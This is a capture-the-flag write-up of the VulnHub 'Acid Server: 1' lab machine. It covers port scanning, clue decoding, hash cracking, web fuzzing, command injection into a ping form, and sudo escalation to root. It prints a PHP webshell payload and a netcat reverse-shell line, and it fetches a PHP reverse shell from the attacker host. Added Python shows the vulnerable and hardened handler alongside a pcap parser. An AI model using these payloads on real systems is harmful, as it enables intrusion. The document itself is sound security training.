Acid … just say NO to drugs!
If you follow @Vulnhub you will have noticed that there have recently been quite a few new vulnerable boot2root machines released. Needless to say, you know what time it is… It’s boot2root CTF time!
Introducing Acid Server: 1 by @m_avinash143.
Welcome to the world of Acid.
Fairy tails use secret keys to open the magical doors.
Goal: Escalate the privileges to root and capture the flag. Once anyone is able to beat the machine, please let me know.
In my previous write-ups you will have noticed that I always start out by running netdiscover to find the IP address of the challenge host. Well, I’m starting to get lazy, so now I give all my challenge machines the same MAC address and DHCP lease…. “Save the planet; don’t waste white space”. ;)
Let’s find what ports are open or listening:
xerubus@omerta:~$ sudo nmap -sT -Pn -p- -A --script vuln 192.168.77.54 -v
---snip---
Scanning 192.168.77.54 [65535 ports]
Discovered open port 33447/tcp on 192.168.77.54
Completed Connect Scan at 11:50, 2.93s elapsed (65535 total ports)
Initiating Service scan at 11:50
Scanning 1 service on 192.168.77.54
Completed Service scan at 11:50, 11.02s elapsed (1 service on 1 host)
Initiating OS detection (try #1) against 192.168.77.54
NSE: Script scanning 192.168.77.54.
Initiating NSE at 11:50
NSE Timing: About 93.02% done; ETC: 11:57 (0:00:30 remaining)
NSE Timing: About 93.02% done; ETC: 11:58 (0:00:32 remaining)
NSE Timing: About 93.02% done; ETC: 11:58 (0:00:35 remaining)
NSE Timing: About 93.02% done; ETC: 11:59 (0:00:37 remaining)
Completed NSE at 11:58, 510.64s elapsed
Nmap scan report for 192.168.77.54
Host is up (0.00048s latency).
Not shown: 65534 closed ports
PORT      STATE SERVICE VERSION
33447/tcp open  http    Apache httpd 2.4.10 ((Ubuntu))
---snip---
Okay… a single HTTP service, listening on the non-standard port 33447. Time to take a look in a browser:
Secret keys and fairy tails (tales, surely?)… sounds cool. Viewing the page source reveals an interesting comment on line 76: 0x643239334c6d70775a773d3d
Looks like hex to me, and once converted the result looks like base64. Let’s decode both layers in one go (xxd -r -p skips the non-hex 0x prefix, so there is no need to strip it first):
xerubus@omerta:~$ echo 0x643239334c6d70775a773d3d | xxd -r -p | base64 -d ; echo
wow.jpg
If you look at the source code you will notice that images are stored in /images/. Let’s see if our wow.jpg gives us any clues:
Nothing overly exciting. Let’s grab the image and run strings over it.
xerubus@omerta:~$ strings wow.jpg
GIF89a
"""%%%)))///333777999>>>@@@DDDKKKOOORRRUUU[[[^^^cccfffkkknnnssswwwxxx~~~
8rU:
---snip---
;37:61:65:65:30:66:36:64:35:38:38:65:64:39:39:30:35:65:65:33:37:66:31:36:61:37:63:36:31:30:64:34
xerubus@omerta:~$
A couple of things to take note of… Firstly, the image is not a jpg, it is a gif. Secondly, the last line looks like it could be some hex.
xerubus@omerta:~$ echo 3761656530663664353838656439393035656533376631366137633631306434 | xxd -r -p ; echo
7aee0f6d588ed9905ee37f16a7c610d4
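Both decodes above follow the same pattern: tolerate a 0x prefix or colon separators, hex-decode, then check whether the result is itself another encoding. Here is a small Python helper that peels those layers automatically and stops when the output stops being printable text (the sign that you have reached raw bytes such as a hash). This is an added example and not part of the original write-up; the two input strings are copied from the page, the function names and the "stop at non-printable" heuristic are my own.

```python
import base64
import binascii
import re

# Both strings are copied from the write-up: the HTML comment on the landing page and
# the trailing line that `strings` pulled out of wow.jpg.
HTML_COMMENT = "0x643239334c6d70775a773d3d"
STRINGS_LINE = (";37:61:65:65:30:66:36:64:35:38:38:65:64:39:39:30:35:65:65:33:37:"
                "66:31:36:61:37:63:36:31:30:64:34")

B64_RE = re.compile(r"[A-Za-z0-9+/]+={0,2}")


def try_hex(s: str):
    """Hex-decode after tolerating what xxd -r -p tolerates: a 0x prefix, colon or
    whitespace separators and stray punctuation at either end. None if not hex."""
    s = s.strip().strip(";,.")
    if s.lower().startswith("0x"):
        s = s[2:]
    s = re.sub(r"[:\s]", "", s)
    if not s or len(s) % 2 or not re.fullmatch(r"[0-9a-fA-F]+", s):
        return None
    return bytes.fromhex(s)


def try_base64(s: str):
    """Strict base64 decode (correct alphabet, length a multiple of 4). None if not base64."""
    s = s.strip()
    if len(s) % 4 or not B64_RE.fullmatch(s):
        return None
    try:
        return base64.b64decode(s, validate=True)
    except binascii.Error:
        return None


def peel(blob: str, max_layers: int = 5) -> list:
    """Peel hex and base64 layers off `blob` until the result is no longer an encoding
    or no longer printable ASCII (e.g. the raw bytes of a hash). Returns every layer,
    starting with the input. Hex is tried first, as in the write-up."""
    layers, cur = [blob], blob
    for _ in range(max_layers):
        decoded = try_hex(cur) or try_base64(cur)
        if decoded is None:
            break
        try:
            text = decoded.decode("ascii")
        except UnicodeDecodeError:
            break  # binary output: the previous layer was the final answer
        if not text.isprintable():
            break
        layers.append(text)
        cur = text
    return layers


if __name__ == "__main__":
    print(" -> ".join(peel(HTML_COMMENT)))
    print(" -> ".join(peel(STRINGS_LINE)))
```

Running it prints the comment peeled to wow.jpg via its base64 middle layer, and the strings line peeled exactly once to the 32-character hex string: trying to hex-decode that again yields non-ASCII bytes, which is the cue that it is a digest rather than yet another encoding.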
Let’s use hash-identifier to work out what hash we are playing with:
xerubus@omerta:~$ echo 7aee0f6d588ed9905ee37f16a7c610d4 | hash-identifier
---snip---
-------------------------------------------------------------------------
HASH:
Possible Hashs:
[+] MD5
And last but not least, we’ll push the MD5 hash through hashcat:
xerubus@omerta:~$ hashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt --quiet
7aee0f6d588ed9905ee37f16a7c610d4:63425
63425 means nothing to me at the moment, so let’s just move on. Did you notice the title of the default webpage? /Challenge. Let’s try that before we start fuzzing the webserver.
We’re greeted with a page welcoming us to hell; how nice. After spending a bit of time trying usual credentials and attempting SQL injection, I decided to fuzz the webserver:
xerubus@omerta:~$ wfuzz -c -z file,/usr/share/dirb/wordlists/big.txt --hc 404 http://192.168.77.54:33447/Challenge/FUZZ.php
********************************************************
* Wfuzz 2.0 - The Web Bruteforcer                      *
********************************************************

Target: http://192.168.77.54:33447/Challenge/FUZZ.php
Payload type: file,/usr/share/dirb/wordlists/big.txt

Total requests: 20469
==================================================================
ID      Response   Lines      Word         Chars          Request
==================================================================
00013:  C=403     11 L       32 W        314 Ch        " - .htaccess"
00015:  C=403     11 L       32 W        314 Ch        " - .htpasswd"
03963:  C=200     17 L       33 W        496 Ch        " - cake"
07060:  C=200     12 L       27 W        309 Ch        " - error"
09550:  C=302      0 L        0 W          0 Ch        " - include"
09560:  C=200     40 L       80 W       1333 Ch        " - index"
cake.php doesn’t help us out too much, but it does have an interesting title; /Magic_Box:
Browsing the /Challenge/Magic_Box path gives us a permission denied warning, so there may be something interesting in there… let’s try fuzzing it:
xerubus@omerta:~$ wfuzz -c -z file,/usr/share/dirb/wordlists/big.txt --hc 404 http://192.168.77.54:33447/Challenge/Magic_Box/FUZZ.php
********************************************************
* Wfuzz 2.0 - The Web Bruteforcer                      *
********************************************************

Target: http://192.168.77.54:33447/Challenge/Magic_Box/FUZZ.php
Payload type: file,/usr/share/dirb/wordlists/big.txt

Total requests: 20469
==================================================================
ID      Response   Lines      Word         Chars          Request
==================================================================
00015:  C=403     11 L       32 W        324 Ch        " - .htaccess"
00017:  C=403     11 L       32 W        324 Ch        " - .htpasswd"
04959:  C=200     17 L       54 W        594 Ch        " - command"
11145:  C=200      0 L        0 W          0 Ch        " - low"
Let’s take a look at command.php:
Ohhhh… enter a host to ping you say? Is anyone else thinking remote command execution? Let’s intercept the POST and response in burpsuite and see what we get:
Nice! Possible command execution right there. Let’s give it a try:
xerubus@omerta:~$ curl -i -s -k -X 'POST' --data-binary $'IP=%3Bwhoami&submit=submit' 'http://192.168.77.54:33447/Challenge/Magic_Box/command.php'
HTTP/1.1 200 OK
Date: Tue, 25 Aug 2015 02:02:55 GMT
Server: Apache/2.4.10 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 608
Content-Type: text/html; charset=UTF-8

www-data
</br><!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<link rel="stylesheet" href="../css/style.css">
<link rel="stylesheet" href="../styles/main.css" />
<title>Reverse Kunfu</title>
</head>
<body>
<div class="wrapper">
<div class="container">
<p>
<h1>You are 1337 Hax0r. Keep your patiene and proceed further.</h1>
<br>
<form method="post" action="">
Enter the Host to Ping:<input name="IP" placeholder="IP ADDRESS" type="text" id="IP" maxlength="200">
<input name="submit" type="submit" id="submit" value="submit">
</body>
</html>
Well hello www-data! At this point I tried the obvious next step, a reverse shell (;nc -e /bin/sh 192.168.77.55 1337); no joy unfortunately.
I then tried to use wget to grab a PHP shell from my server; again, no luck. I then thought about echoing out a PHP one-liner to create a simple PHP script; again, no luck.
Hmm… perhaps www-data doesn’t have permission to write to the current directory. A quick ls -al showed that the parent directory (/Challenge) is writeable, so let’s try the PHP one-liner again, this time writing one directory up. :)
xerubus@omerta:~$ curl -i -s -k -X 'POST' --data-binary $'IP=%3Becho+%27%3C%3Fphp+system%28%24_GET%5B%22cmd%22%5D%29%3B+%3F%3E%27+%3E+..%2Fshell.php&submit=submit' 'http://192.168.77.54:33447/Challenge/Magic_Box/command.php'
HTTP/1.1 200 OK
Seems okay. Let’s test it:
xerubus@omerta:~$ curl http://192.168.77.54:33447/Challenge/shell.php?cmd=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
BAM! We have a command shell. Let’s do it properly this time and put a reverse PHP shell on the server:
http://192.168.77.54:33447/Challenge/shell.php?cmd=php%20-r%20%27file_put_contents%28%22phpshell.php%22,%20fopen%28%22http://192.168.77.55/phpshell.txt%22,%20%27r%27%29%29;%27
Execute the new phpshell.php and it’s reverse shell time:
xerubus@omerta:~$ nc -nvlp 1337
nc: listening on :: 1337 ...
nc: listening on 0.0.0.0 1337 ...
nc: connect to 192.168.77.55 1337 from 192.168.77.54 37414
Linux acid 3.19.0-15-generic #15-Ubuntu SMP Thu Apr 16 23:32:01 UTC 2015 i686 i686 i686 GNU/Linux
 12:38:41 up  3:02,  0 users,  load average: 0.00, 0.02, 0.05
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ hostname
acid
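Before moving on it is worth spelling out what command.php must have been doing, and how the same feature should have been written. The following Python models the vulnerable ping handler beside a hardened version, and includes a decoder for the form bodies used above so the webshell payload can be read in the clear. This is an added example, not the challenge’s PHP source (which we never saw): /bin/echo stands in for ping so it runs anywhere without network access, and the function names are my own.

```python
import ipaddress
import subprocess
from urllib.parse import parse_qs

# The form body from the write-up that dropped the one-line webshell (copied from the page).
WEBSHELL_BODY = ("IP=%3Becho+%27%3C%3Fphp+system%28%24_GET%5B%22cmd%22%5D%29%3B+%3F%3E%27"
                 "+%3E+..%2Fshell.php&submit=submit")


def decode_form(body: str) -> dict:
    """Decode an application/x-www-form-urlencoded body into {field: value}."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def ping_vulnerable(ip: str) -> str:
    """Model of what command.php evidently did: splice the IP field into a shell string.
    /bin/echo stands in for ping (constructed stand-in) so the demo runs without network.
    A ';' in the field ends the echo command and starts whatever follows."""
    proc = subprocess.run(f"echo pinging {ip}", shell=True, capture_output=True, text=True)
    return proc.stdout


def is_ip(value: str) -> bool:
    """Allowlist check: the field must parse as an IPv4/IPv6 literal, nothing else."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return False


def ping_safe(ip: str) -> str:
    """Hardened version: validate first, then pass the value as a single argv element
    with no shell involved, so no metacharacter can start a second command."""
    if not is_ip(ip):
        raise ValueError(f"refusing non-IP input: {ip!r}")
    proc = subprocess.run(["echo", "pinging", ip], capture_output=True, text=True)
    return proc.stdout


if __name__ == "__main__":
    payload = "127.0.0.1; echo INJECTED"
    print(ping_vulnerable(payload))  # second output line proves the injected command ran
    print(decode_form(WEBSHELL_BODY)["IP"])
    try:
        ping_safe(payload)
    except ValueError as exc:
        print("blocked:", exc)
```

Two points a reviewer would raise against the original form: the maxlength="200" attribute on the input is enforced only by the browser and does nothing against curl, and validating the value is not enough on its own if it is still handed to a shell; the argv-list call is what removes the injection primitive.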
Time to enumerate the host. I checked for the usual suid binaries, world writeable files and directories, log files, etc. /etc/passwd contained the following users of interest; however, permissions stop me from finding anything useful.
www-data@acid:/$ cat /etc/passwd
---snip---
whoopsie:x:109:118::/nonexistent:/bin/false
acid:x:1000:1000:acid,,,:/home/acid:/bin/bash
---snip---
saman:x:1001:1001:,,,:/home/saman:/bin/bash
It was almost time to be lazy and use one of the automated Linux privilege escalation check scripts, until I saw it…. /s.bin… that’s not part of a normal tree. Taking a look at the contents reveals a single PHP file:
www-data@acid:/s.bin$ cat investigate.php
<?php
echo "Now you have to behave like an investigator to catch the culprit\n";
?>
A taunt… I continue to rummage around the system looking for clues or anything else odd. Getting even closer to running an automated script, I come across a recently modified directory in /sbin, which once again isn’t a directory I’ve noticed before.
www-data@acid:/sbin$ ls -altr
total 9660
-rwxr-xr-x  1 root root  2251 Dec  2  2009 on_ac_power
-rwxr-xr-x  1 root root  9688 May  3  2012 iwspy
-rwxr-xr-x  1 root root 13804 May  3  2012 iwpriv
---snip---
drwxr-xr-x  2 root root  4096 Aug  7 17:46 raw_vs_isi
drwxr-xr-x 23 root root  4096 Aug  8 11:00 ..
drwxr-xr-x  3 root root 12288 Aug  8 11:58 .
… and upon closer inspection we find a capture file.
www-data@acid:/sbin/raw_vs_isi$ ls -al
total 816
drwxr-xr-x 2 root root   4096 Aug  7 17:46 .
drwxr-xr-x 3 root root  12288 Aug  8 11:58 ..
-rwxr--r-- 1 acid acid 818744 Aug  7 16:09 hint.pcapng
www-data@acid:/sbin/raw_vs_isi$ file hint.pcapng
hint.pcapng: pcap-ng capture file - version 1.0
A quick symlink to our writeable web directory and we can take a look at the capture file on our attacking machine.
Using strings, we come across something interesting…..
xerubus@omerta:~$ strings hint.pcapng | more
Linux 3.18.0-kali3-686-pae
Dumpcap 1.10.2 (SVN Rev 51934 from /trunk-1.10)
eth0
Linux 3.18.0-kali3-686-pae
wpad
wpad
FHFAEBEECACACACACACACACACACACAAA
EJFDEBFEEBFACACACACACACACACACAAA
isatap
isatap
---snip---
FHFAEBEECACACACACACACACACACACAAA
grWhat was the name of the Culprit ???
---snip---
Taking a look at the capture file with tcpdump, we find that the string comes from a conversation over port 1337. Let’s use tcpick to pull out all the port 1337 traffic and tidy up the output:
xerubus@omerta:~$ tcpick -C -yP -r hint.pcapng "port 1337"
Starting tcpick 0.2.1 at 2015-08-24 17:39 AEST
Timeout for connections is 600
tcpick: reading from hint.pcapng
setting filter: "port 1337"
1      SYN-SENT       192.168.0.44:38476 > 192.168.0.46:1337
1      SYN-RECEIVED   192.168.0.44:38476 > 192.168.0.46:1337
1      ESTABLISHED    192.168.0.44:38476 > 192.168.0.46:1337
heya
hello
What was the name of the Culprit ???
saman and now a days he's known by the alias of 1337hax0r
oh...Fuck....Great...Now, we gonna Catch Him Soon :D
Yes .. We have to !!
The mad bomber is on a rage
Ohk...cya
Over and Out
1      FIN-WAIT-1     192.168.0.44:38476 > 192.168.0.46:1337
1      TIME-WAIT      192.168.0.44:38476 > 192.168.0.46:1337
1      CLOSED         192.168.0.44:38476 > 192.168.0.46:1337
tcpick: done reading from hint.pcapng
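tcpick did the heavy lifting here, but when that tool is not to hand it is worth knowing how little is needed to pull a cleartext chat out of a pcapng yourself. The following Python is an added example and not part of the original write-up: it walks the pcapng block structure (Section Header, Interface Description and Enhanced Packet blocks), decodes Ethernet/IPv4/TCP, and replays the segments on one port in capture order, labelled by direction. Because hint.pcapng itself is not reproduced here, the script builds a constructed capture of its own using the page’s hosts and port, a chat modelled on the one tcpick showed, and an unrelated HTTP segment that the port filter must drop.

```python
import socket
import struct

SHB, IDB, EPB = 0x0A0D0D0A, 0x00000001, 0x00000006  # pcapng block types


def _block(btype: int, body: bytes) -> bytes:
    """Wrap a body in pcapng block framing: type, total length, body, total length."""
    body += b"\0" * (-len(body) % 4)  # bodies are padded to 32-bit boundaries
    total = 12 + len(body)
    return struct.pack("<II", btype, total) + body + struct.pack("<I", total)


def build_pcapng(frames) -> bytes:
    """Constructed fixture: a minimal little-endian pcapng with one Ethernet interface."""
    out = _block(SHB, struct.pack("<IHHq", 0x1A2B3C4D, 1, 0, -1))  # byte-order magic, v1.0
    out += _block(IDB, struct.pack("<HHI", 1, 0, 65535))           # LINKTYPE_ETHERNET
    for i, frame in enumerate(frames):
        epb = struct.pack("<IIIII", 0, 0, i, len(frame), len(frame))  # if_id, ts hi/lo, caplen, len
        out += _block(EPB, epb + frame)
    return out


def iter_frames(data: bytes):
    """Yield the raw frame of every Enhanced Packet Block, honouring the section byte order."""
    end, off = "<", 0
    while off + 12 <= len(data):
        if struct.unpack_from("<I", data, off)[0] == SHB:  # SHB type reads the same either way
            end = "<" if data[off + 8:off + 12] == b"\x4d\x3c\x2b\x1a" else ">"
        btype, total = struct.unpack_from(end + "II", data, off)
        if total < 12:
            break  # corrupt length, stop rather than loop forever
        if btype == EPB:
            caplen = struct.unpack_from(end + "I", data, off + 20)[0]
            yield data[off + 28:off + 28 + caplen]
        off += total


def tcp_payloads(frames, port: int):
    """Ethernet/IPv4/TCP decode; yield (sport, dport, payload) for segments touching `port`."""
    for frame in frames:
        if len(frame) < 34 or frame[12:14] != b"\x08\x00":  # IPv4 only
            continue
        ip = frame[14:]
        ihl = (ip[0] & 0x0F) * 4
        total_len = struct.unpack_from("!H", ip, 2)[0]
        if ip[9] != 6:  # not TCP
            continue
        tcp = ip[ihl:total_len]
        sport, dport = struct.unpack_from("!HH", tcp, 0)
        if port not in (sport, dport):
            continue
        payload = tcp[(tcp[12] >> 4) * 4:]  # data offset is in 32-bit words
        if payload:
            yield sport, dport, payload


def chat_transcript(pcapng: bytes, port: int = 1337) -> list:
    """Replay the cleartext exchange on `port` as 'client:'/'server:' lines, in capture order."""
    lines = []
    for sport, dport, payload in tcp_payloads(iter_frames(pcapng), port):
        who = "server" if sport == port else "client"
        lines.append(f"{who}: {payload.decode('utf-8', errors='replace').rstrip()}")
    return lines


def make_tcp_frame(src: str, dst: str, sport: int, dport: int, payload: bytes) -> bytes:
    """Constructed Ethernet/IPv4/TCP frame with zeroed checksums (enough for parsing)."""
    eth = b"\x02" * 6 + b"\x04" * 6 + b"\x08\x00"
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, 0x18, 65535, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0, 64, 6, 0,
                     socket.inet_aton(src), socket.inet_aton(dst)) + tcp
    return eth + ip


# Constructed fixture: the write-up's hosts and port, a chat modelled on the one tcpick
# showed, plus an unrelated HTTP segment that the port filter has to drop.
A, B = "192.168.0.44", "192.168.0.46"
SAMPLE_FRAMES = [
    make_tcp_frame(A, B, 38476, 1337, b"heya\n"),
    make_tcp_frame(B, A, 1337, 38476, b"hello\n"),
    make_tcp_frame(A, B, 38476, 1337, b"What was the name of the Culprit ???\n"),
    make_tcp_frame(B, A, 1337, 38476, b"saman and now a days he's known by the alias of 1337hax0r\n"),
    make_tcp_frame(A, "192.168.0.1", 40000, 80, b"GET / HTTP/1.0\r\n\r\n"),
]

if __name__ == "__main__":
    for line in chat_transcript(build_pcapng(SAMPLE_FRAMES)):
        print(line)
```

Point chat_transcript at the bytes of a real capture (open(path, "rb").read()) and it does the same job on hint.pcapng; the parser ignores option fields and blocks it does not know, so captures written by dumpcap with interface statistics or name resolution blocks still work. It does not reassemble out-of-order or retransmitted segments, which is fine for a small local chat but is the reason tcpick or Wireshark’s Follow TCP Stream is the better tool for anything messier.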
According to the conversation, our culprit is saman, who we know has a user account on acid. Could his alias of 1337hax0r also be his password?
www-data@acid:/var/www/html/Challenge$ su - saman
su - saman
Password: 1337hax0r
saman@acid:~$
Yes.. yes it could. Does saman have any sudo privileges?
saman@acid:~$ sudo -l
Matching Defaults entries for saman on acid:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User saman may run the following commands on acid:
    (ALL : ALL) ALL
Yes.. he certainly does. Root.. here we come!
saman@acid:~$ sudo bash
root@acid:~# hostname ; id
acid
uid=0(root) gid=0(root) groups=0(root)
… and it’s time to raise the flag!
root@acid:~# cd /root
root@acid:/root# ls
flag.txt
root@acid:/root# cat flag.txt

Dear Hax0r,

You have successfully completed the challenge.

I hope you like it.

FLAG NAME: "Acid@Makke@Hax0r"

Kind & Best Regards

-ACID
facebook: https://facebook.com/m.avinash143
THE END. Acid was fun, but remember kids…. “Just say no to drugs”.
Thanks for the Acid Server: 1 boot2root @m_avinash143.
Thank you like always @Vulnhub and @g0tmi1k for hosting such awesome challenges.
Until next time, tight lines and happy hacking.